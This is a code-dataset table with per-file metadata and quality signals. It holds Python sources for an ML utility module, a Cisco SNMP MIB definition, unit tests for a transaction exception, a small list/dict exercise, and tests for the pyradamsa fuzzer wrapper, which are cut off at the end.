hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d2efc70efd70e2b9c96aa0a04ce151c8c6316974 | 6,286 | py | Python | src/cog_abm/ML/core.py | 4dnucleome/cog-abm | 6f6450141a996b067d3a396d47f4386215a4042c | [
"BSD-3-Clause"
] | 1 | 2015-09-27T18:39:11.000Z | 2015-09-27T18:39:11.000Z | src/cog_abm/ML/core.py | 4dnucleome/cog-abm | 6f6450141a996b067d3a396d47f4386215a4042c | [
"BSD-3-Clause"
] | null | null | null | src/cog_abm/ML/core.py | 4dnucleome/cog-abm | 6f6450141a996b067d3a396d47f4386215a4042c | [
"BSD-3-Clause"
] | null | null | null | """
Most useful things connected with ML
"""
import math
from itertools import izip
from random import shuffle
from scipy.io.arff import loadarff
from cog_abm.extras.tools import flatten
class Classifier(object):
def classify(self, sample):
pass
def classify_pval(self, sample):
"""
Returns tuple with class and probability of sample belonging to it
"""
pass
def class_probabilities(self, sample):
"""
Returns dict with mapping class->probability that sample belongs to it
"""
pass
def train(self, samples):
pass
def clone(self):
"""
Returns copy of classifier. This is default implementation.
Should be overriden in subclasses.
@rtype: Classifier
@return: New instance of classifier.
"""
import copy
return copy.deepcopy(self)
class Attribute(object):
ID = None
""" This class field is for id when putting some conversion method in dict
"""
def get_value(self, value):
''' value is inner representation
'''
pass
def set_value(self, value):
''' value is outer representation
'''
return value
def __eq__(self, other):
return self.ID == other.ID
class NumericAttribute(Attribute):
ID = "NumericAttribute"
def get_value(self, value):
return value
class NominalAttribute(Attribute):
ID = "NominalAttribute"
def __init__(self, symbols):
"""
Symbols should be strings!
For example Orange doesn't support any other format
"""
symbols = [str(s) for s in symbols]
self.symbols = tuple(s for s in symbols)
self.mapping = dict(reversed(x) for x in enumerate(self.symbols))
self.tmp_rng = set(xrange(len(self.symbols)))
def get_symbol(self, idx):
return self.symbols[idx]
def get_idx(self, symbol):
return self.mapping[str(symbol)]
def get_value(self, value):
return self.get_symbol(value)
def set_value(self, value):
return self.set_symbol(value)
def set_symbol(self, symbol):
return self.get_idx(symbol)
def __eq__(self, other):
return super(NominalAttribute, self).__eq__(other) and \
set(self.symbols) == set(other.symbols)
class Sample(object):
def __init__(self, values, meta=None, cls=None, cls_meta=None,
dist_fun=None, last_is_class=False, cls_idx=None):
self.values = values[:]
self.meta = meta or [NumericAttribute() for _ in values]
if last_is_class or cls_idx is not None:
if last_is_class:
cls_idx = -1
self.cls_meta = self.meta[cls_idx]
self.cls = self.values[cls_idx]
self.meta = self.meta[:]
del self.values[cls_idx], self.meta[cls_idx]
else:
self.cls = cls
self.cls_meta = cls_meta
if dist_fun is None and \
all(attr.ID == NumericAttribute.ID for attr in self.meta):
self.dist_fun = euclidean_distance
else:
self.dist_fun = dist_fun
def get_cls(self):
if self.cls_meta is None or self.cls is None:
return None
return self.cls_meta.get_value(self.cls)
def get_values(self):
return [m.get_value(v) for v, m in izip(self.values, self.meta)]
def distance(self, other):
return self.dist_fun(self, other)
def __eq__(self, other):
return self.cls == other.cls and self.cls_meta == other.cls_meta and \
self.meta == other.meta and self.values == other.values
def __hash__(self):
return 3 * hash(tuple(self.values)) + 5 * hash(self.cls)
def __str__(self):
return "({0}, {1})".format(str(self.get_values()), self.get_cls())
def __repr__(self):
return str(self)
def copy_basic(self):
return Sample(self.values, self.meta, dist_fun=self.dist_fun)
def copy_full(self):
return Sample(self.values, self.meta, self.cls, self.cls_meta,
self.dist_fun)
def copy_set_cls(self, cls, meta):
s = self.copy_basic()
s.cls_meta = meta
s.cls = meta.set_value(cls)
return s
#Sample distance functions
def euclidean_distance(sx, sy):
return math.sqrt(math.fsum([
(x - y) * (x - y) for x, y in izip(sx.get_values(), sy.get_values())
]))
def load_samples_arff(file_name, last_is_class=False, look_for_cls=True):
a_data, a_meta = loadarff(file_name)
names = a_meta.names()
attr = {"nominal": lambda attrs: NominalAttribute(attrs),
"numeric": lambda _: NumericAttribute()}
gen = (a_meta[n] for n in names)
meta = [attr[a[0]](a[1]) for a in gen]
cls_idx = None
if look_for_cls:
for i, name in enumerate(names):
if a_meta[name][0] == "nominal" and name.lower() == "class":
cls_idx = i
break
def create_sample(s):
values = [mi.set_value(vi) for mi, vi in izip(meta, s)]
return \
Sample(values, meta, last_is_class=last_is_class, cls_idx=cls_idx)
return [create_sample(s) for s in a_data]
def split_data(data, train_ratio=2. / 3.):
""" data - samples to split into two sets: train and test
train_ratio - real number in [0,1]
returns (train, test) - pair of data sets
"""
tmp = [s for s in data]
shuffle(tmp)
train = [s for i, s in enumerate(tmp) if i < train_ratio * len(tmp)]
test = [s for i, s in enumerate(tmp) if i >= train_ratio * len(tmp)]
return (train, test)
def split_data_cv(data, folds=8):
""" data - samples to split into two sets *folds* times
returns [(train, test), ...] - list of pairs of data sets
"""
tmp = [s for s in data]
shuffle(tmp)
N = len(tmp)
M = N / folds
overflow = N % folds
splits = []
i = 0
while i < N:
n = M
if overflow > 0:
overflow -= 1
n += 1
split = tmp[i:i + n]
splits.append(split)
i += n
return [(flatten(splits[:i] + splits[i + 1:]), splits[i])
for i in xrange(folds)]
| 26.411765 | 78 | 0.592428 | 867 | 6,286 | 4.139562 | 0.202999 | 0.027306 | 0.021454 | 0.009752 | 0.176651 | 0.127055 | 0.075787 | 0.04068 | 0.04068 | 0.04068 | 0 | 0.004085 | 0.299077 | 6,286 | 237 | 79 | 26.523207 | 0.810486 | 0.11979 | 0 | 0.147887 | 0 | 0 | 0.012896 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.225352 | false | 0.035211 | 0.042254 | 0.119718 | 0.507042 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
d2f80279a37490706e441c30f354e3e695ef55d7 | 8,122 | py | Python | pysnmp/CISCO-WAN-BBIF-ATM-CONN-STAT-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/CISCO-WAN-BBIF-ATM-CONN-STAT-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/CISCO-WAN-BBIF-ATM-CONN-STAT-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module CISCO-WAN-BBIF-ATM-CONN-STAT-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-WAN-BBIF-ATM-CONN-STAT-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 18:03:57 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ValueRangeConstraint, ValueSizeConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsIntersection", "ConstraintsUnion")
bbChanCntGrp, = mibBuilder.importSymbols("BASIS-MIB", "bbChanCntGrp")
ciscoWan, = mibBuilder.importSymbols("CISCOWAN-SMI", "ciscoWan")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
MibIdentifier, Counter64, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, IpAddress, Counter32, NotificationType, Unsigned32, TimeTicks, Gauge32, ObjectIdentity, Bits, ModuleIdentity, Integer32 = mibBuilder.importSymbols("SNMPv2-SMI", "MibIdentifier", "Counter64", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "IpAddress", "Counter32", "NotificationType", "Unsigned32", "TimeTicks", "Gauge32", "ObjectIdentity", "Bits", "ModuleIdentity", "Integer32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
ciscoWanBbifAtmConnStatMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 351, 150, 36))
ciscoWanBbifAtmConnStatMIB.setRevisions(('2002-10-18 00:00',))
if mibBuilder.loadTexts: ciscoWanBbifAtmConnStatMIB.setLastUpdated('200210180000Z')
if mibBuilder.loadTexts: ciscoWanBbifAtmConnStatMIB.setOrganization('Cisco Systems, Inc.')
bbChanCntGrpTable = MibTable((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1), )
if mibBuilder.loadTexts: bbChanCntGrpTable.setStatus('current')
bbChanCntGrpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1), ).setIndexNames((0, "CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanCntNum"))
if mibBuilder.loadTexts: bbChanCntGrpEntry.setStatus('current')
bbChanCntNum = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(16, 4111))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanCntNum.setStatus('current')
bbChanRcvClp0Cells = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanRcvClp0Cells.setStatus('current')
bbChanRcvClp1Cells = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanRcvClp1Cells.setStatus('current')
bbChanNonConformCellsAtGcra1Policer = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanNonConformCellsAtGcra1Policer.setStatus('current')
bbChanNonConformCellsAtGcra2Policer = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanNonConformCellsAtGcra2Policer.setStatus('current')
bbChanRcvEOFCells = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanRcvEOFCells.setStatus('current')
bbChanDscdClp0Cells = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanDscdClp0Cells.setStatus('current')
bbChanDscdClp1Cells = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanDscdClp1Cells.setStatus('current')
bbChanRcvCellsSent = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanRcvCellsSent.setStatus('current')
bbChanXmtClp0Cells = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanXmtClp0Cells.setStatus('current')
bbChanXmtClp1Cells = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanXmtClp1Cells.setStatus('current')
bbChanDscdClpZeroCellsToPort = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanDscdClpZeroCellsToPort.setStatus('current')
bbChanDscdClpOneCellsToPort = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 13), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanDscdClpOneCellsToPort.setStatus('current')
bbChanCntClrButton = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 14), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("noAction", 1), ("resetCounters", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: bbChanCntClrButton.setStatus('current')
cwbAtmConnStatMIBConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 351, 150, 36, 2))
cwbAtmConnStatMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 351, 150, 36, 2, 1))
cwbAtmConnStatMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 351, 150, 36, 2, 2))
cwbAtmConnStatCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 351, 150, 36, 2, 2, 1)).setObjects(("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "cwbAtmConnStatsGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cwbAtmConnStatCompliance = cwbAtmConnStatCompliance.setStatus('current')
cwbAtmConnStatsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 351, 150, 36, 2, 1, 1)).setObjects(("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanCntNum"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanRcvClp0Cells"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanRcvClp1Cells"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanNonConformCellsAtGcra1Policer"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanNonConformCellsAtGcra2Policer"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanRcvEOFCells"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanDscdClp0Cells"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanDscdClp1Cells"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanRcvCellsSent"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanXmtClp0Cells"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanXmtClp1Cells"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanDscdClpZeroCellsToPort"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanDscdClpOneCellsToPort"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanCntClrButton"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cwbAtmConnStatsGroup = cwbAtmConnStatsGroup.setStatus('current')
mibBuilder.exportSymbols("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", bbChanRcvCellsSent=bbChanRcvCellsSent, bbChanRcvClp1Cells=bbChanRcvClp1Cells, bbChanDscdClp0Cells=bbChanDscdClp0Cells, PYSNMP_MODULE_ID=ciscoWanBbifAtmConnStatMIB, bbChanDscdClpOneCellsToPort=bbChanDscdClpOneCellsToPort, bbChanNonConformCellsAtGcra1Policer=bbChanNonConformCellsAtGcra1Policer, cwbAtmConnStatMIBCompliances=cwbAtmConnStatMIBCompliances, bbChanXmtClp1Cells=bbChanXmtClp1Cells, cwbAtmConnStatMIBGroups=cwbAtmConnStatMIBGroups, bbChanRcvEOFCells=bbChanRcvEOFCells, bbChanRcvClp0Cells=bbChanRcvClp0Cells, cwbAtmConnStatsGroup=cwbAtmConnStatsGroup, cwbAtmConnStatMIBConformance=cwbAtmConnStatMIBConformance, bbChanCntClrButton=bbChanCntClrButton, bbChanXmtClp0Cells=bbChanXmtClp0Cells, bbChanCntNum=bbChanCntNum, bbChanDscdClpZeroCellsToPort=bbChanDscdClpZeroCellsToPort, bbChanDscdClp1Cells=bbChanDscdClp1Cells, bbChanCntGrpTable=bbChanCntGrpTable, ciscoWanBbifAtmConnStatMIB=ciscoWanBbifAtmConnStatMIB, bbChanCntGrpEntry=bbChanCntGrpEntry, cwbAtmConnStatCompliance=cwbAtmConnStatCompliance, bbChanNonConformCellsAtGcra2Policer=bbChanNonConformCellsAtGcra2Policer)
| 128.920635 | 1,137 | 0.767914 | 910 | 8,122 | 6.851648 | 0.172527 | 0.007378 | 0.010585 | 0.014114 | 0.389735 | 0.351403 | 0.255172 | 0.196792 | 0.174659 | 0.160545 | 0 | 0.078188 | 0.078798 | 8,122 | 62 | 1,138 | 131 | 0.755146 | 0.044078 | 0 | 0.037037 | 0 | 0 | 0.217924 | 0.091941 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.148148 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d2fa0a74ae8af642c87a16ed10cf79ecc3f88ff9 | 3,263 | py | Python | tests/unit/exceptions/transaction_test.py | cdominguezg/dokklib-db-extended | 8e20bb76b5727d13fdd806b1d8ea1d49362ed3c7 | [
"Apache-2.0"
] | null | null | null | tests/unit/exceptions/transaction_test.py | cdominguezg/dokklib-db-extended | 8e20bb76b5727d13fdd806b1d8ea1d49362ed3c7 | [
"Apache-2.0"
] | null | null | null | tests/unit/exceptions/transaction_test.py | cdominguezg/dokklib-db-extended | 8e20bb76b5727d13fdd806b1d8ea1d49362ed3c7 | [
"Apache-2.0"
] | null | null | null | import dokklib_db_extended as db
from dokklib_db_extended.errors.transaction import TransactionCanceledException
from tests.unit import TestBase
class TestTransactionCanceledException(TestBase):
_op_name = 'TransactWriteItems'
def _get_error(self, msg):
return {
'Error': {
'Message': msg,
'Code': 'TransactionCanceledException'
}
}
def test_empty_message(self):
error = self._get_error('')
e = TransactionCanceledException([], '', error, self._op_name)
self.assertListEqual(e.reasons, [])
def test_mismatch(self):
error = self._get_error('')
e = TransactionCanceledException(['1'], '', error, self._op_name)
with self.assertRaises(ValueError):
e.reasons
def test_one_reason(self):
msg = 'Transaction cancelled, please refer cancellation reasons for ' \
'specific reasons [ConditionalCheckFailed]'
error = self._get_error(msg)
e = TransactionCanceledException(['1'], '', error, self._op_name)
exp = [db.errors.ConditionalCheckFailedException]
self.assertListEqual(e.reasons, exp)
def test_two_reasons(self):
msg = 'Transaction cancelled, please refer cancellation reasons for ' \
'specific reasons [ConditionalCheckFailed, None]'
error = self._get_error(msg)
e = TransactionCanceledException(['oparg1', 'oparg2'],
'',
error,
self._op_name)
exp = [db.errors.ConditionalCheckFailedException, None]
self.assertListEqual(e.reasons, exp)
def test_no_space_reasons(self):
msg = 'Transaction cancelled, please refer cancellation reasons for ' \
'specific reasons [ConditionalCheckFailed,None]'
error = self._get_error(msg)
e = TransactionCanceledException(['oparg1', 'oparg2'],
'',
error,
self._op_name)
exp = [db.errors.ConditionalCheckFailedException, None]
self.assertListEqual(e.reasons, exp)
def test_has_error(self):
msg = 'Transaction cancelled, please refer cancellation reasons for ' \
'specific reasons [ConditionalCheckFailed, None]'
error = self._get_error(msg)
e = TransactionCanceledException(['oparg1', 'oparg2'],
'',
error,
self._op_name)
self.assertTrue(e.has_error(db.errors.ConditionalCheckFailedException))
def test_has_no_error(self):
msg = 'Transaction cancelled, please refer cancellation reasons for ' \
'specific reasons [ConditionalCheckFailed, None]'
error = self._get_error(msg)
e = TransactionCanceledException(['oparg1', 'oparg2'],
'',
error,
self._op_name)
self.assertFalse(e.has_error(db.errors.ValidationError))
| 41.833333 | 79 | 0.563285 | 271 | 3,263 | 6.586716 | 0.206642 | 0.085714 | 0.047059 | 0.066667 | 0.737255 | 0.707563 | 0.707563 | 0.593838 | 0.561905 | 0.561905 | 0 | 0.004695 | 0.347226 | 3,263 | 77 | 80 | 42.376623 | 0.833333 | 0 | 0 | 0.590909 | 0 | 0 | 0.197671 | 0.046889 | 0 | 0 | 0 | 0 | 0.106061 | 1 | 0.121212 | false | 0 | 0.045455 | 0.015152 | 0.212121 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d2fb82c17a398f07961305c91ab7b78c1bb422df | 475 | py | Python | exercises/ex39-pre.py | jinkyukim-me/StudyPython | 6c98598c23c506101882392645fbb14d4aa998d4 | [
"MIT"
] | null | null | null | exercises/ex39-pre.py | jinkyukim-me/StudyPython | 6c98598c23c506101882392645fbb14d4aa998d4 | [
"MIT"
] | null | null | null | exercises/ex39-pre.py | jinkyukim-me/StudyPython | 6c98598c23c506101882392645fbb14d4aa998d4 | [
"MIT"
] | null | null | null | things = ['a', 'b', 'c', 'd']
print(things)
print(things[1])
things[1] = 'z'
print(things[1])
print(things)
things = ['a', 'b', 'c', 'd']
print("=" * 50)
stuff = {'name' : 'Jinkyu', 'age' : 40, 'height' : 6 * 12 + 2}
print(stuff)
print(stuff['name'])
print(stuff['age'])
print(stuff['height'])
stuff['city'] = "SF"
print(stuff['city'])
stuff[1] = "Wow"
stuff[2] = "Neato"
print(stuff)
print(stuff[1])
print(stuff[2])
del stuff['city']
del stuff[1]
del stuff[2]
print(stuff)
| 18.269231 | 62 | 0.591579 | 76 | 475 | 3.697368 | 0.302632 | 0.320285 | 0.05694 | 0.064057 | 0.106762 | 0.106762 | 0 | 0 | 0 | 0 | 0 | 0.041162 | 0.130526 | 475 | 25 | 63 | 19 | 0.639225 | 0 | 0 | 0.375 | 0 | 0 | 0.135021 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.583333 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
96023c255885996dd9e97c52c31b8fb90b3a8c8c | 1,176 | py | Python | tests/test_lib.py | tsundokul/pyradamsa | 8d1fdb5c4cefff26fa24b68440110b9fb6558ee4 | [
"MIT"
] | 14 | 2020-07-16T11:25:01.000Z | 2022-01-26T14:01:32.000Z | tests/test_lib.py | tsundokul/pyradamsa | 8d1fdb5c4cefff26fa24b68440110b9fb6558ee4 | [
"MIT"
] | 2 | 2020-07-09T23:14:54.000Z | 2021-06-13T12:55:50.000Z | tests/test_lib.py | tsundokul/pyradamsa | 8d1fdb5c4cefff26fa24b68440110b9fb6558ee4 | [
"MIT"
] | 2 | 2020-11-16T11:30:42.000Z | 2021-07-09T10:34:43.000Z | import ctypes
import pytest
import pyradamsa
import sys
import unittest
def test_lib_present():
assert len(pyradamsa.Radamsa.lib_path()) > 0, 'library not found'
def test_lib_symbols():
lib = ctypes.CDLL(pyradamsa.Radamsa.lib_path())
assert hasattr(lib, 'init')
assert hasattr(lib, 'radamsa')
assert hasattr(lib, 'radamsa_inplace')
def test_default_attrs():
assert pyradamsa.Radamsa().mut_offset == 4096
r = pyradamsa.Radamsa(17, 2048)
assert r.seed == 17
assert r.mut_offset == 2048
r = pyradamsa.Radamsa(mut_offset=19)
assert r.mut_offset == 19
assert r.seed == None
@pytest.fixture
def data():
return b'GET /auth?pass=HelloWorld HTTP1.1'
def test_seed_arg(data):
assert pyradamsa.Radamsa().fuzz(
data, seed=1337) == b'GET /auth?pass=HelloWorld HTTP\xc0\xb1.1'
def test_seed_wraparound(data):
r = pyradamsa.Radamsa()
assert r.fuzz(data, -1) == r.fuzz(data, sys.maxsize * 2 + 1)
def test_seed_static(data):
r = pyradamsa.Radamsa(1337)
assert r.fuzz(data) == r.fuzz(data)
def test_returned_len():
data = b"\xaa\x00"*100
